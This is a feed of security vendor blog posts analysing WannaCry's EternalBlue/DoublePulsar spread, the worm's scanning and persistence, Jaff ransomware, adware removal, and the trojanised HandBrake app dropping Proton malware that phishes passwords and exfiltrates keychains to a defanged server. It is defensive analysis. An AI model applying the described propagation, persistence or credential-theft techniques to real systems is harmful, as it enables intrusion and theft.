News organizations and other publications were inundating security companies for information to provide to the general public – and some were all too happy to oblige. Information quickly spread that a malicious spam campaign had been responsible for circulating the malware. This claim will usually be a safe bet, as ransomware is often spread via malicious spam campaigns. Admittedly, we also first thought the campaign may have been spread by spam and subsequently spent the entire weekend pouring through emails within the Malwarebytes Email Telemetry system searching for the culprit. But like many others, our traps came up empty.

Claims of WannaCry being distributed via email may have been an easy mistake to make. Not only was the malware outbreak occurring on a Friday afternoon, but around the same time a new ransomware campaign was being heavily distributed via malicious email and the popular Necurs botnet. We recently wrote about the Jaff ransomware family and the spam campaign that was delivering it.

Some may have seen the rash of news occurring on their feeds, an uptick in ransomware-themed document malware in their honeypots, and then jumped to conclusions as a way to be first with the news.

But here at Malwarebytes we try not to do that. And now after a thorough review of the collected information, on behalf of the entire Malwarebytes Threat Intelligence team, we feel confident in saying those speculations were incorrect.

Indeed, the ‘ransomworm’ that took the world by storm was not distributed via an email malspam campaign. Rather, our research shows this nasty worm was spread via an operation that hunts down vulnerable public facing SMB ports and then uses the alleged NSA-leaked EternalBlue exploit to get on the network and then the (also NSA alleged) DoublePulsar exploit to establish persistence and allow for the installation of the WannaCry Ransomware.

We will present information to support this claim by analyzing the available packet captures, binary files, and content from within the information contained in the ShadowBrokers dump, and correlating what we know thus far regarding the malware infection vector.

Here’s what we know EternalBlue

EternalBlue is an SMB exploit affecting various Windows operating systems from XP to Windows 7 and various flavors of Windows Server 2003 & 2008. The exploit technique is known as HeapSpraying and is used to inject shellcode into vulnerable systems allowing for the exploitation of the system. The code is capable of targeting vulnerable machine by IP address and attempting exploitation via SMB port 445. The EternalBlue code is closely tied with the DoublePulsar backdoor and even checks for the existence of the malware during the installation routine.

EternalBlue checks for DoublePulsar

EternalBlue strings

Bits of information obtained by reviewing the EternalBlue-2.2.0.exe file help demonstrate the expected behavior of the software. The screenshot above shows that the malware:

  • Sends an SMB Echo request to the targeted machine
  • Sets up the exploit for the target architecture
  • Performs SMB fingerprinting
  • Attempts exploit
  • If successful exploitation occurs, WIN
  • Pings the backdoor to get an SMB reply
  • And if the backdoor is not installed, it’s game on!

The ability of this code to beacon out to other potential SMB targets allows for propagation of the malicious code to other vulnerable machines on connected networks. This is what made the WannaCry ransomware so dangerous. The ability to spread and self-propagate causes widespread infection without any user interaction.


DoublePulsar is the backdoor malware that EternalBlue checks to determine the existence and they are closely tied together.

This particular malware uses an APC (Asynchronous Procedure Call) to inject a DLL into the user mode process of lsass.exe. Once injected, exploit shellcode is installed to help maintain persistence on the target machine. After verifying a successful installation, the backdoor code can be removed from the system.

DoublePulsar Parameters

The purpose of the DoublePulsar malware is to establish a connection allowing the attacker to exfiltrate information and/or install additional malware (such as WannaCry) to the system. These connections allow an attacker to establish a Ring 0 level connection via SMB (TCP port 445) and or RDP (TCP port 3389) protocols.

DoublePulsar Ring0 Connections

Network analysis

Taking a look at the wannacry.pcap file shared to VirusTotal by @benkow_ helps us attribute the previously discussed code as the infection vector via the initial calls of the attack cycle.

A high-level view of a compromised machine in Argentina ( that attacked the honeypot:

The widely publicized kill-switch domain is present in the pcap file. As was reported, the malware made a DNS request to this site. Until @MalwareTech inadvertently shut down the campaign by registering the domain, the malware would use this as a mechanism to determine if it should run.

DNS lookup to Sinkhole

The SMB traffic is also clearly visible in the capture. These SMB requests are checking for vulnerable machines using the exploit code above.

SMB Requests

The exploit sends an SMB ‘trans2 SESSION_SETUP’ request to the infected machine. According to SANS, this is short for Transaction 2 Subcommand Extension and is a function of the exploit. This request can determine if a system is already compromised and will issue different response codes to the attacker indicating ‘normal’ or ‘infected’ machines.

Diving into the .pcap a bit more, we can indeed see this SMB Trans2 command and the subsequent response code of 81 which indicates an infected system. If the attacker receives this code in response, then the SMB exploits can be used as a means to covertly exfiltrate data or install software such as WannaCry.

Trans2 Multiplex ID

Putting it all together

The information we have gathered by studying the DoublePulsar backdoor capabilities allows us to link this SMB exploit to the EternalBlue SMB exploit. It’s really not hard to do so as both were patched as part of the MS17-017 Security Bulletin prior to this event, and as previously mentioned, were both released in the well-publicized ShadowBrokers-NSA dumps.

Without otherwise definitive proof of the infection vector via user-provided captures or logs, and based on the user reports stating that machines were infected when employees arrived for work, we’re left to conclude that the attackers initiated an operation to hunt down vulnerable public facing SMB ports, and once located, using the newly available SMB exploits to deploy malware and propagate to other vulnerable machines within connected networks.

Developing a well-crafted campaign to identify just as little as a few thousand vulnerable machines would allow for the widespread distribution of this malware on the scale and speed that we saw with this particular ransomware variant.

So what did we learn?

Don’t jump to conclusions. Malware analysis is difficult and it can take some time to determine attribution to a specific group, and/or to assess the functionality of a particular campaign – especially late on a Friday (which BTW, can all you hackers quit making releases on Fridays!!). First, comes stopping the attack, second comes analyzing the attack. Remember, patience is a virtue.

Update, update, UPDATE! Microsoft released patches for these exploits prior to their weaponization. Granted, patches weren’t available for all Operating Systems, but the patch was available for the vast majority of machines. This event even forced Microsoft to release a patch for the long-ago EOL Windows XP – which gets back to the first thing that was said. UPDATE! Why are there still machines on XP!? These machines are vulnerable (beyond this attack) to the ransomware functionality of this attack and they need to be updated.

Disable unnecessary protocols. SMB is used to transfer files between computers. The setting is enabled on many machines but is not needed by the majority. Disable SMB and other communications protocols if not in use.

Network Segmentation is also a valuable suggestion as such precautions can prevent such outbreaks from spreading to other systems and networks, thus reducing exposure of important systems.

And finally, don’t horde exploits. Microsoft president Brad Smith used this event to call out the ‘nations of the world’ to not stockpile flaws in computer code that could be used to craft digital weapons.

That reminds me of an article I wrote a few years ago (and which was substantially cut for length) about Hacking Team and the government sanctioned use of exploits.

Hack Me: A Geopolitical Analysis of the Government Use of Surveillance Software

I guess things haven’t changed…

The post How did the WannaCry Ransomworm spread? appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Information stolen? What now?

Malwarebytes - Thu, 05/18/2017 - 15:00

There are several different types of malware that look for interesting information on an infected computer and transmit that information to the threat actor.

Identifying and removing the malware is our job, but what do you need to do yourself to control the aftermath? To answer that question it’s important to know what information the malware was after and sometimes how long it has been active.


What types of information are the malware authors after? Most of the time they are after anything that they can turn into cash. In rare cases of targeted attacks, they could be after other confidential information. Consider for example a keylogger installed by a close relative who is curious about some aspects of your private life.

But usually we can divide the sought after information in these categories:

  • Banking details
  • Shopping website credentials
  • Other website credentials
  • Gaming credentials
  • Bitcoin and other eMoney wallets
  • Email credentials
Time period

When is the infection period important and why? It is important in cases of malware that tracks the user’s activities like keyloggers and malware that intercepts internet traffic. It should be clear that knowing when this tracking started can be very helpful in determining which important information could have been stolen.

Tip: do not rely on your memory too much. If you are not sure, change that password of which you are unsure whether you have used it recently.

How do I recognize malware that has stolen information?

Sometimes you can tell by our naming convention that a particular malware was after your information. But not all of them are called Spyware.PasswordStealer. For starters look up information about the detection on your machine. Alarm bells should be ringing if the detections are spyware, keyloggers, and backdoors. Although, other Trojans are capable of stealing information as well.

In our threat library you can find information of this kind under the header Remediation, so look for your detection there if this applies to you.


In most cases, this is easy to guess. The stolen information could be used in ways that will cost you money. What could be the threat actors goals?

  • Withdrawing money from your accounts
  • Shopping at your expense
  • Impersonating you for other reasons
  • Extortion with personal information (doxing, sextortion, etc.)

What can you do to limit the dangers as much as possible?

  • Change the passwords that might have been stolen for every website you can remember logging into.
  • If your email account has been compromised, change that password first as other credentials may be sent to you by mail and still end up in the wrong hands. Some webshops even send you a password in plain-text (shudders).
  • Keep a close eye on your banking and eMoney accounts. Use the activity alerts that some banks offer.
  • Keep tabs on your posts in social media. It may look silly to check what you have supposedly posted yourself, but imagine someone else doing it for you.
Extra precautions Related article

Info stealers

Stay safe out there and get protected.


Pieter Arntz

The post Information stolen? What now? appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Privacy Awareness Week: A primer

Malwarebytes - Wed, 05/17/2017 - 15:00

The Asia Pacific Privacy Authorities (APPA) began an initiative called Privacy Awareness Week, or PAW, with the purpose of educating users about current privacy issues and promoting the importance of keeping their personal information safe.

This remains the core of why it exists for more than a decade now.

For those who may not be familiar with what this campaign is all about, this post aims to answer the questions you may have in mind about PAW.

When is Privacy Awareness Week?

APPA typically celebrates Privacy Awareness Week in May every year. Since the organization has a number of member countries, they each decide on when they want to hold the event locally.

In the first week of May, Singapore held its PAW locally. Hong Kong, New Zealand, and the United States held their own campaigns in the second week of May.

Australia is celebrating Privacy Awareness Week this week.

Are there other countries that will hold this event?

There are a total of 11 member countries comprising APPA. Aside from those already mentioned, Canada, Colombia, Korea, Macao, Mexico, and Peru are or will also be celebrating this campaign.

What’s the theme of this year’s Privacy Awareness Week?

There are two themes that APPA members are using: “Share with care” and “Trust and transparency”.

Share with care. This stresses on the importance of caring for your privacy, given that our current technological landscape is heavily data-driven. It also reminds users to think about what may or may not happen to their personal information once they have been shared.

Trust and transparency: Both trust and transparency are vital to each another, as people normally expect one to exist with the other. Case in point, it is important for businesses to gain the trust of their clients and it’s important for clients to know that the businesses they trust are clear about what they do, how they store, and how they use what they give them, which in this case is their personal information.

Can we celebrate Privacy Awareness Week even if our country is not a member of APPA?

Privacy Awareness Week is about educating users concerning privacy. There are ways individuals and organizations can celebrate PAW. One example is to use social media to raise awareness to your followers. Another is to do a refresher of your organization’s privacy policy. If they don’t have one, why not encourage your organization to make one?

Privacy and security go hand in hand. Practicing solid cybersecurity hygiene coupled with a fair familiarity of how personal data changes hands can bring about positive experiences to our digital lives. As such, we encourage you, dear Reader, to check out some of our previous posts and reacquaint yourselves on how you can keep your data safe and your computing devices secure:

Happy Privacy Security Week, everyone, wherever you are, and remember to share your personal info with care!


The Malwarebytes Labs Team

The post Privacy Awareness Week: A primer appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Wanna Cry some more? Ransomware roundup special edition

Malwarebytes - Mon, 05/15/2017 - 21:25

Whether you call it WannaCry, WannaCrypt, WCrypt, Wanacrypt0r, WCry, or one of the other names currently vying for the “call me this” crown, the ubiquitous ransomware which brought portions of the UK’s NHS to its knees over the weekend along with everything from train stations to ATM machines is still with us, and causing mayhem Worldwide. As a result, our regular roundup has been replaced with what will hopefully serve as a useful place to collect links related to the attack.

First thing’s first: this was a big enough incident that Microsoft created a special patch for Windows XP users, some three years after it had the plug pulled on support. Regardless of Windows OS, go get your update.

Now that we have that out of the way, here’s some handy links for you to get a good overview of what’s been going on:

This is a rapidly changing story, with a lot of valuable follow-up data being posted to haunts favored by security researchers such as Twitter, and we’ll likely add more links as the days pass. Update your security tools, patch your version of Windows and stay safe!


The Malwarebytes Labs Team

The post Wanna Cry some more? Ransomware roundup special edition appeared first on Malwarebytes Labs.

Categories: Techie Feeds

The worm that spreads WanaCrypt0r

Malwarebytes - Fri, 05/12/2017 - 22:02

Something that many security researchers have feared has indeed come true. Threat actors have integrated a critical exploit taking advantage of a popular communication protocol used by Windows systems, crippling thousands of computers worldwide with ransomware.

Within hours of being leveraged, a flaw that had been recently patched by Microsoft has been used to distribute the WanaCrypt0r ransomware and wreak havoc worldwide.

In this blog post, we will describe the worm responsible for spreading this ransomware by looking at its capabilities and what has made this threat so successful.

Main functionality

WanaCrypt0r has been most effective—not only does the ransomware loop through every open RDP session on a system and run the ransomware as that user, but the initial component that gets dropped on systems appears to be a worm that contains and runs the ransomware, spreading itself using the ETERNALBLUE SMB vulnerability (MS17-010).

The WinMain of this executable first tries to connect to the website It doesn’t actually download anything there, just tries to connect. If the connection succeeds, the binary exits.

This was probably some kind of kill switch or anti-sandbox technique. Whichever it is, it has backfired on the authors of the worm, as the domain has been sinkholed and the host in question now resolves to an IP address that hosts a website. Therefore, nothing will happen on any new systems that runs the executable. This only applies to the binary with the hash listed above; there may well be new versions released in the future.

After this check passes, the first thing the worm does is check the number of arguments it was launched with. If it was run with less than two arguments passed, it installs a service called mssecsvc2.0 with display name Microsoft Security Center (2.0) Service (where the binary ran is itself with two arguments), starts that service, drops the ransomware binary located in the resources of the worm, and runs it.

If it was run with two arguments or more—in other words, if it was run as a service—execution eventually falls through to the worm function.

The initialization function called first calls WSAStartup() to initialize networking, then CryptAcquireContext() to initialize the crypto API so it can use a cryptographically-secure pseudo-random number generator. It then calls a function that initializes two buffers used for storing the worm payload DLLs, one x86 and one x64. It copies the payload DLLs from the .data section of the worm and then copies the entire worm binary after it.

The code of each payload DLL is very small, just getting the resource content (i.e. the worm binary), dropping to disk as C:\WINDOWS\mssecsvc.exe (this path is actually hardcoded) and executing it.

SMB vulnerability leveraged to spread ransomware worldwide

After initializing the functionality used by the worm, two threads are created. The first thread scans hosts on the LAN. The second thread gets created 128 times and scans hosts on the wider Internet.

The first thread (in charge of scanning LAN) uses GetAdaptersInfo() to get a list of IP ranges on the local network, then creates an array of every IP in those ranges to scan.

The LAN scanning is multithreaded itself, and there is code to prevent scanning more than 10 IP addresses on the LAN at a time.

The scanning thread tries to connect to port 445, and if so creates a new thread to try to exploit the system using MS17-010/EternalBlue. If the exploitation attempts take over 10 minutes, then the exploitation thread is stopped.

The threads that scan the Internet generate a random IP address, using either the OS’s cryptographically secure pseudo-random number generator initialized earlier, or a weaker pseudo-random number generator if the CSPRNG failed to initialize. If connection to port 445 on that random IP address succeeds, the entire /24 range is scanned, and if port 445 is open, exploit attempts are made. This time, exploitation timeout for each IP happens not after 10 minutes but after one hour.

The exploitation thread tries several times to exploit, with two different sets of buffers used (perhaps one for x86 and one for x64). If it detects the presence of DOUBLEPULSAR after any exploitation attempt, it uses DOUBLEPULSAR to load the relevant payload DLL.


It is critical that you install all available OS updates to prevent getting exploited by the MS17-010 vulnerability. Any systems running a Windows version that did not receive a patch for this vulnerability should be removed from all networks. If your systems have been affected, DOUBLEPULSAR will have also been installed, so this will need to also be removed. A script is available that can remotely detect and remove the DOUBLEPULSAR backdoor. Consumer and business customers of Malwarebytes are protected from this ransomware by the premium version of Malwarebytes and Malwarebytes Endpoint Security, respectively.

The post The worm that spreads WanaCrypt0r appeared first on Malwarebytes Labs.

Categories: Techie Feeds

WanaCrypt0r ransomware hits it big just before the weekend

Malwarebytes - Fri, 05/12/2017 - 18:07

Reports of two massive, global ransomware attacks are dominating the news. As workers in Europe are heading home for the weekend, ransomware is shutting down their systems. Here’s what we know so far.

Big targets

National Health Service (NHS) England, and Telefonica, one of the largest telecom providers in the world, have each given out statements indicating that their systems have been brought to a grinding halt by a ransomware that Malwarebytes detects as Ransom.WanaCrypt0r. The ransomware has also been observed hitting companies in Spain, Russia, Ukraine, and Taiwan.


The ransomware is spread using a known, and patched, vulnerability (MS17-010) that came from a leaked NSA set of exploits that we reported on our blog in April. Our research shows the encryption is done with RSA-2048 encryption. That means that decryption will be next to impossible, unless the coders have made a mistake that we haven’t found yet.

The demanded ransom of $300 and the potential risks to the public that come with the targets being big utility and healthcare companies seem to be in shrill contrast. We can only hope that the companies that were hit will be able to get their backups deployed quickly and can start the recovery from this cyberattack. 


Consumers and businesses alike should be sure their systems and software are updated with all current patches in order to stop the spread of infection. Both our consumer product, Malwarebytes, and our business product, Malwarebytes Endpoint Security, protect against this threat, since we detect this ransomware. And our anti-ransomware technology will stop any future unknown variants.

More to come

We’ll continue to update this post as news develops. We’ll provide additional technical analysis throughout the day.

The post WanaCrypt0r ransomware hits it big just before the weekend appeared first on Malwarebytes Labs.

Categories: Techie Feeds

New ‘Jaff’ ransomware via Necurs asks for 2 BTC

Malwarebytes - Thu, 05/11/2017 - 17:11

There is yet another ransomware on the block, but contrary to the many copycats out there this one appears to be more serious and widespread since it is part of the Necurs spam campaigns.

Originally identified by security researcher S!Ri, the Jaff ransomware looks very identical to Locky in many ways: same distribution via the Necurs botnet, same PDF that opens up a Word document with a macro, and also similar payment page.

However, this is where the comparison ends, since the code base is different as well as the ransom itself. Jaff asks for an astounding 2 BTC, which is about $3,700 at the time of writing.

Malwarebytes users are already protected against this ransomware thanks to our multi-layer defense. In the diagram below we show how the threat can be blocked via each of our protection modules (in a typical scenario, the threat would be stopped at the first layer which is the Application Behavior Protection):

In the meantime, the return of Locky after a short hiatus has not been as big as anticipated. The appearance of the Jaff ransomware may also take away some market shares from it.

The post New ‘Jaff’ ransomware via Necurs asks for 2 BTC appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Adware the series, part 3

Malwarebytes - Wed, 05/10/2017 - 15:00

In this series of posts, we will be using the flowchart below to follow the process of determining which adware we are dealing with. Our objective is to give you an idea of how many different types of adware are around for Windows systems. Though most are classified as PUPs, you will also see the occasional Trojan or rootkit, especially for the types that are more difficult to detect and remove.

Getting rid of files

In this post, we will discuss several methods to remove the files responsible for showing you the offending advertisements in those cases where the identified process is not a browser.


With many PUPs and sometimes even more intrusive adware, uninstalling the program that is showing you the advertisements will be enough. If this works it’s often the cleanest and easiest method to get rid of the advertisements. Identifying which program to uninstall from your list of installed software and features is sometimes the hardest step in this process. Here are a few tips that might help you to do so:

  • Use your favorite search engine to look for the process name we found to be responsible for the advertisement window. Sometimes this will reveal the name of the software it belongs to and how it’s listed in your list of installed programs and features.
  • Sort the list of installed programs and features by date of install. Although this date can easily be spoofed, most software packages in this category won’t. Compare that date to the date when the advertisements first started appearing.

  • Warning: in cases where you used a bundler there might be several entries with the same date.
  • Use your favorite search engine to look for the entries in your list of installed programs and features that you don’t recognize or remember installing.

Once you have identified the entries you want to remove, select them by clicking on the line in the list, and click on Uninstall.

It may be necessary to reboot the system for the changes to take effect. If this solves the problem, great. If not, keep reading.

Delete the file

If the advertisements don’t stop after trying the user-friendly approach outlined earlier, your next step is to delete the file which is responsible for the advertisements. This is much less a clean solution as it might leave more clutter behind. There are several methods that can be used and I will try to list them according to stubbornness. But first, we need to find the file. Since we already used Process Explorer to identify the process, we will also use it to locate the file. Right-click on the selected process and choose Properties and look at the Image tab to see the full path to the file.

Make a note of the path as we will need that later on. Then close the properties window and right-click the selected process once more. This time use the Kill Process Tree option and confirm that you want to kill this process (and if applicable the ones under it). If the process respawns immediately or Process Explorer (running elevated) is unable to kill it, you will have to wait for other parts in this series. If the process dies you can proceed with the deletion methods below.

  • Easy: navigate to the file path you made a note of earlier, right-click the file and choose Delete.
  • If that doesn’t work, there is always FileASSASSIN, but you will have to be 100% sure about the file you are going to remove.
    • Download and install FileASSASSIN following the prompts.

Browse to the file you want to delete, check all the upper boxes as shown below and click Execute.

  • You will see a prompt telling you whether the deletion was successful or not.
  • If this method does not work, give the Use delete on Windows reboot functions of FileASSASSIN a try.
  • The last method we will discuss here involves rebooting your computer in Safe Mode with Command Prompt. Doing so will cause Windows to only run the bare necessities and lessen the chance of the user being unable to delete the file. In the Command prompt use this command structure: DEL /F /S /Q /A “{full path to the file, including the extension}”.
  • Sometimes deleting such a file can cause errors which can be avoided by replacing the file with another (legitimate) one. Again you will want to boot into Safe Mode with Command Prompt use this command structure COPY /V /Y “{full path to the legitimate file including the extension}” “{location of the file to be replaced}”

Note that the last part just is the destination folder, there is no need to specify the filename and extension again.

If all of the above do not work for you, you may have to wait for the post that deals with rootkits. See you later. And stay safe out there.

Index Part 1
  • Identify the process
  • Clear browser caches
  • Remove browser extensions
Part 2
  • Proxies
  • Winsock hijackers
  • DNS hijackers
Part 3
  • Type of software
  • Uninstall
  • Remove file
  • Replace file
 Up next, part 4
  • Scheduled tasks
  • Services



Pieter Arntz

The post Adware the series, part 3 appeared first on Malwarebytes Labs.

Categories: Techie Feeds

A week in security (May 01 – May 07)

Malwarebytes - Mon, 05/08/2017 - 18:00

Last week, we reported about that fake Google Docs app in real time as it wrecks havoc among GMail users worldwide. We also pushed out part 2 of our series on adware. During World Password Day, we highlighted the fact that although using multiple passwords is good, this may be difficult if one cannot manage them efficiently.

As it’s spring in the Northern Hemisphere, we found it appropriate and timely to write up a spring cleaning post.

Lastly, we covered a fair amount of macOS malware, specifically OSX.Dok and Snake. Click those links to check out technical details for each.

OWASP top ten – Boring security that pays off

Below are notable news stories and security-related happenings:

  • Super Free Music Player Is The Latest Malware On Google Play. “Another day, another piece of malware lurking on Google Play, masquerading as a free and helpful app. This time it’s called ‘Super Free Music Player’ and is supposedly a ‘great song app for discovering and listening to trending music’, and contains ‘unlimited free songs from Soundcloud.'” (Source: Help Net Security)
  • Schools Among The Most Sought After Cyber Targets: ESET Report. “What makes these organizations such an inviting target is schools, both those of higher education and local school districts, hold in one place all the types of data prized by hackers, health care information, student and employee personally identifiable information (PII), research and even payment card data, according to a report by ESET researcher Lisa Myers.” (Source: SC Magazine)
  • UK Office Workers ‘Too Trusting’ Of Email Attachments. “More than half (58%) of office workers among 1000 employees surveyed at mid-to-large UK businesses admitted to often opening email attachments from unknown senders, leaving companies open to breaches from documents carrying malicious exploits hidden inside common file-types.” (Source: InfoSecurity Magazine)
  • Criminals Turning To Fraudulent Gift Cards. “Traditionally, gift cards have been a quick way to make stolen credit card numbers pay off quickly. They buy the gift cards online, in bulk, then use the gift cards at their leisure or resell them, without worrying that the credit card number has been canceled — until the charge backs started coming in from the credit card companies and merchants wised up.” (Source: CSO)
  • HideMyAss! Privilege Escalation Flaws Exposed. “A set of serious security flaws in the HideMyAss! proxy service which could place user security and privacy at risk have been publicly disclosed. Over the weekend, Security researcher Han Sahin said that multiple privilege escalation vulnerabilities exist in HideMyAss! Pro VPN for Apple’s OS X operating system, a subscription-based virtual private network (VPN) service used to mask user traffic and online activities.” (Source: ZDNet)
  • 7 Steps To Fight Ransomware. “As ransomware perpetrators continue to hone their skills, we’re seeing a shift to more specific targets. The driver of this shift is the realization that companies, especially larger ones, are much higher-value targets than an average individual and are thus able to pay significantly higher ransoms. This change has elevated the need for companies to strengthen their defensive strategies. Executives must allocate resources and ensure strategies are active against ransomware intent on paralyzing their organization.” (Source: Dark Reading)
  • Fraudsters Draining Accounts With ‘SIM Swaps’ – What To Do. “A new phone can take over your old number because the number is actually tied to your SIM card – in fact, SIM is short for subscriber identity module, a special system-on-a-chip card that securely stores the cryptographic secret that identifies your phone number to the network. You may also need to get a new SIM from your mobile provider if you switch to a phone that requires a differently sized SIM card to the one in your current device.” (Source: Sophos’s Naked Security Blog)
  • Thieves Drain 2fa-protected Bank Accounts By Abusing SS7 Routing Protocol. “The unidentified attackers exploited weaknesses in Signalling System No. 7, a telephony signaling language that more than 800 telecommunications companies around the world use to ensure their networks interoperate. SS7, as the protocol is known, makes it possible for a person in one country to send text messages to someone in another country. It also allows phone calls to go uninterrupted when the caller is traveling on a train.” (Source: Ars Technica)
  • iPhone Phishing Scam Crosses Over Physical Crime. “Last late April a friend of mine had his iPhone stolen in the streets—an unfortunately familiar occurrence in big, metropolitan areas in countries like Brazil. He managed to buy a new one but kept the same number for convenience. Nothing appeared to be out of the ordinary at first—until he realized the thief changed his Facebook password.” (Source: TrendLabs’s Security Intelligence Blog)
  • NYPD: Fraud Ring Recruited Mules Via Social Media. “New York City police are claiming victory after smashing a multi-million-dollar financial fraud ring which is alleged to have recruited participants via enticing social media ads. The authorities have indicted 39 people for their part in a sophisticated operation which resulted in a whopping $2.5m in fraud.” (Source: InfoSecurity Magazine)
  • Europe Pumps Out 50% More Cybercrime Attacks Than US. “Cybercrime attacks launched from Europe reached more than 50 million in the first quarter, double the volume coming out of the US, according to the ThreatMetrix Q1 Cybercrime Report released today. And within Europe, Italy, France, Germany, and the UK accounted for half of all attacks originating out of the region, with the UK and Germany contributing the lion’s share.” (Source: Dark Reading)

Safe surfing, everyone!


The Malwarebytes Labs Team

The post A week in security (May 01 – May 07) appeared first on Malwarebytes Labs.

Categories: Techie Feeds

HandBrake hacked to drop new variant of Proton malware

Malwarebytes - Mon, 05/08/2017 - 17:04

Last year, the Transmission torrent app was hacked not just once, but twice, to install the KeRanger ransomware and, later, the Keydnap backdoor. Now, the same thing has happened to the popular DVD-ripping HandBrake app, which is installing a new variant of the Proton malware.

The real HandBrake 1.0.7 app was replaced with a malicious copy on May 2. This issue was discovered and the malicious app was removed on May 6, also a security warning was posted on the HandBrake website. Both the HandBrake website and the copy of HandBrake available via Homebrew (a command-line software installation system) were affected.

Am I infected?

The security warning provides SHA1 and SHA256 hashes for the malicious HandBrake-1.0.7.dmg file, recommending that you check this against the hash of your download before installing. To do this, enter the following command in the Terminal app (found in the Utilities folder in the Applications folder):

shasum /path/to/HandBrake-1.0.7.dmg

(Of course, be sure to insert the proper path to the .dmg file. Note that you can drag a file onto the Terminal window to insert its path into the command automatically.)

Compare the value returned by this command to the SHA1 hash. If it’s a match, throw that .dmg file in the trash, delete your copy of HandBrake, and scan your Mac with Malwarebytes for Mac. We detect this malware as OSX.Proton.

At this point, you can – in theory – safely download a new copy of HandBrake. I say “in theory” because we don’t know yet how the HandBrake site was hacked and what mitigations have been put in place to prevent future hacks.

If you download a new copy of HandBrake, you can check it against the checksums listed on the HandBrake site to verify that it is valid. However, there’s a big problem with this: If the website has been hacked to replace the legit copy of the software with a bad one, it’s reasonable to assume that the checksums there could be replaced with bad ones as well.

Unfortunately, HandBrake is not code signed, so there’s no real way to verify with 100% certainty that the copy you have has not been tampered with.

Malicious behavior

The malicious copy of HandBrake, when run, will immediately ask for an admin password.

This is not normal for HandBrake, which may tip off a veteran user of the software. However, for a new user, or someone installing an update who isn’t yet familiar with the behavior of that update, this may not raise any red flags.

If you are suspicious and click the Cancel button, it seems that the malware is not installed. Further, in my testing, there were no additional prompts in opening the app after the first. Still, I wouldn’t trust that copy of the app at all, even if it doesn’t appear to be dropping the payload under those conditions.

Unfortunately, checking for updates in the malicious copy does not result in any kind of a warning. When the same thing happened to the Transmission app, the Transmission Project quickly put out an update that would replace the infected app with a clean one, as well as cleaning up any traces of the infection on the system. Hopefully, the same will happen for HandBrake, but at the time of this writing that has not been done yet.

If the password is given, the malicious app will install the malware on the system in the following locations:

~/Library/LaunchAgents/fr.handbrake.activity_agent.plist ~/Library/RenderFiles/

The launch agent runs the activity_agent app at login and keeps it running in the event something terminates it.

However, it seems that this malware may be a bit buggy. On the first install, it also dropped a non-functional launch agent named fr.handbrake.activity_agent.plist-e with some of the contents missing. In another install, the launch agent contained the following non-functional plist data:

<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" ""> <plist version="1.0"> <dict> <key>KeepAlive</key> <true/> <key>Label</key> <string>P_MBN</string> <key>ProgramArguments</key> <array> <string>P_UPTH</string> </array> <key>RunAtLoad</key> <true/> </dict> </plist>

It appears that the malware installs this .plist template, then uses the Unix sed command to search for and replace the P_MBN and P_UPTH values but fails to do some in some cases. Thus, the malware does not always successfully install.

The fact that the malware requests an admin password yet installs all components in user space where no admin password is needed was initially puzzling, but that password request is actually not a system-generated prompt. It’s a phishing dialog displayed by the malware to obtain your password, which will be sent in clear text to api[DOT]handbrake[DOT]biz, the command & control (C&C) server for this malware.

The malware will create some or all of the following files:

~/Library/VideoFrameworks/ ~/Library/VideoFrameworks/ ~/Library/VideoFrameworks/ ~/Library/VideoFrameworks/ ~/Library/VideoFrameworks/ ~/Library/VideoFrameworks/ ~/Library/VideoFrameworks/

These files contain a number of bits of data to be exfiltrated from the machine, such as browser data (including stored form auto-fill data), keychains, and even 1Password vaults. Since the user’s password was phished previously, that can be used to unlock the keychains, and either it or other passwords found in the keychain may be able to unlock other encrypted files. (Pro tip: never store the master password for your password manager in the keychain and make sure it’s a unique, strong password!)

The file is a master archive containing everything in the VideoFrameworks folder. It, too, will be sent to the C&C server, handbrake[DOT]biz, a domain that was just registered on April 29 of this year, presumably in preparation for this attack.

Interestingly, the only two Mac apps ever to be hacked in this manner—Transmission, and now HandBrake—were both originally developed by Eric Petit. Though I don’t know if it means anything at all, it’s certainly a fair question to wonder who has access to both of these projects that could be abused in this manner.

What is Proton?

Many people may never have heard of Proton before. Earlier this year, a signature for Proton was silently added to Apple’s XProtect signatures, but nobody ever saw a copy. Later, Sixgill wrote up findings that revealed Proton was malware up for sale on the dark web.

Proton is a professionally-developed backdoor, which at the time was selling for around 40 BTC (bitcoins), an amount that is currently worth more than $63,000. At that price, unlimited installations were allowed. A single-use license cost around 2 BTC, or more than $3,000.

As an aside, I find it rather ironic that this variant of Proton appears to be a bit buggy, with some installs failing. Hopefully, Proton, Inc’s customers will have similar questions. A little discord among criminals wouldn’t be a bad thing.


This is a general-purpose backdoor with all the usual backdoor functionality. In addition, it appears this malware is exfiltrating the entire keychain, with all passwords. Thus, if you’re infected, the first priority should be changing all your online passwords. (After ensuring that your computer is free of infection, of course! Never change passwords on a device that may still be infected.)

You’ll also want to take any necessary precautions if you have sensitive data that may have been exfiltrated and business users should contact their IT departments if a company Mac is found to be infected.

Seems like this is increasingly becoming something Mac users have to worry about.


Thanks to Amit Serper for analysis that provided some clarifying details about the behavior.

The post HandBrake hacked to drop new variant of Proton malware appeared first on Malwarebytes Labs.

Categories: Techie Feeds


Subscribe to Furiously Eclectic People aggregator - Techie Feeds